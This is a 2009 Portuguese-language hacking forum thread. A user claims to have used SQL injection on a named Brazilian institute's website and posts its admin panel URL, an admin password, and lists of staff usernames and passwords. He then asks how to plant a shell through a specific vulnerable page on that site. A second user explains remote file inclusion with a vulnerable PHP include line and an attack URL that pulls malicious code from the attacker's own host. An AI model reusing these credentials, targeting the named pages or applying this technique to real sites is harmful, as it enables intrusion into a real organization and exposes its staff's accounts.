SQL INJECTION senha não funciona

Started by pinguinacs, 26 de December , 2009, 10:11:50 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

pinguinacs

26 de December , 2009, 10:11:50 PM
ola galera aqui sou eu denovo estudando SQL injection o problema é o seguinte fiquei horas estudando é etc.. estudei estudei é consegui a senha do site é o login

login: admin
senha:npfid23

npfid23

PAINEL PARA SE LOGAR

http://www.ibict.br/adm/index.php

outras senhas

logins:

admin:
kuramoto:
bianca:
ccn:
pedro:
elenice:
davilene:
dilene:
carla:
dici:
angel:
alysson:
beth:
priscilla:
marcos:
ramon:
meinert:
regina:
tonia:
thome:
medeiros:
arthur:
daniela:
simoneb:
claudia:
juliana:


senhas


npfid23:
npfid24:
npfid25:
npfid26:
ccn3000:
npfid32:
npfid34:
npfid36:
carlaibict:
npfid41:
npfid42:
npfid45:
npfid77:
anael:
npfid66:
pfauvn2009:
aloalo08:
npfid53:
70736080:
npfid57:
npfid59:
npfid52:
npfid68:
npfid71:
4210:
npfid72:

más não consigo me logar no site  :'(
PINGUIN INSIDE

pinguinacs

#2
28 de December , 2009, 11:02:36 AM Last Edit: 28 de December , 2009, 11:09:01 AM by pinguinacs
desculpa pelo flood foi mal sem querer  :'(
PINGUIN INSIDE

pinguinacs

#3
28 de December , 2009, 11:08:07 AM Last Edit: 28 de December , 2009, 11:28:16 AM by pinguinacs
valews pela ajuda más a senha não funciounou em nenhum painel

eu queria tirar uma duvida simples também é possivel fazer RFI+SQL INJECTION EX: se eu conseguir se logar nesse site seria possivel colocar uma shell nesse site ??

o usuario reeves(espero que tenha escrito o nome certo)

em uma postagen minha ele disse que a input tava aberta que dava ate para upar uma shell (não tenho a minima ideia de como fazer isso)

input aqui http://www.ibict.br/noticia.php?id=676

minha postagen http://www.forum.darkers.com.br/index.php?topic=12241.15

se da pra fazer isso como eu faria ??

PINGUIN INSIDE

n4n0t3rr0r

#4
28 de December , 2009, 11:32:51 AM Last Edit: 28 de December , 2009, 11:47:49 AM by n4n0t3rr0r
li o post errado e falei merda, mals o flood.

pinguinacs

#5
28 de December , 2009, 01:46:21 PM
Quote from: n4n0t3rr0r on 28 de December , 2009, 11:32:51 AM
li o post errado e falei merda, mals o flood.


É DESCULPA AEE PELO FLOOD
PINGUIN INSIDE

MrRuffl3Z

#6
28 de December , 2009, 02:04:03 PM
Quote from: pinguinacs on 28 de December , 2009, 11:08:07 AM
valews pela ajuda más a senha não funciounou em nenhum painel

eu queria tirar uma duvida simples também é possivel fazer RFI+SQL INJECTION EX: se eu conseguir se logar nesse site seria possivel colocar uma shell nesse site ??

o usuario reeves(espero que tenha escrito o nome certo)

em uma postagen minha ele disse que a input tava aberta que dava ate para upar uma shell (não tenho a minima ideia de como fazer isso)

input aqui http://www.ibict.br/noticia.php?id=676

minha postagen http://www.forum.darkers.com.br/index.php?topic=12241.15

se da pra fazer isso como eu faria ??



RFI = Inclusão Remota de Arquivos

No PHP é quando temos algo muito tosco, tipo:

<?php include $_GET['url']; ?>

Pra explorar um bug desses, é meio óbvio lol...

http://site.com/script.php?url=http://seusite.com/seuscript.txt

O teu script.txt vai conter algum php maligno.. Mas pra isso funcionar, no config do php, tem que estar permitido allow url file inclusion.. é burrice deixar isso ligado se vc não precisa!

pinguinacs

#7
28 de December , 2009, 02:10:12 PM
valews más nao intendo nada de RFI
PINGUIN INSIDE
Print
Go Up Pages1
User actions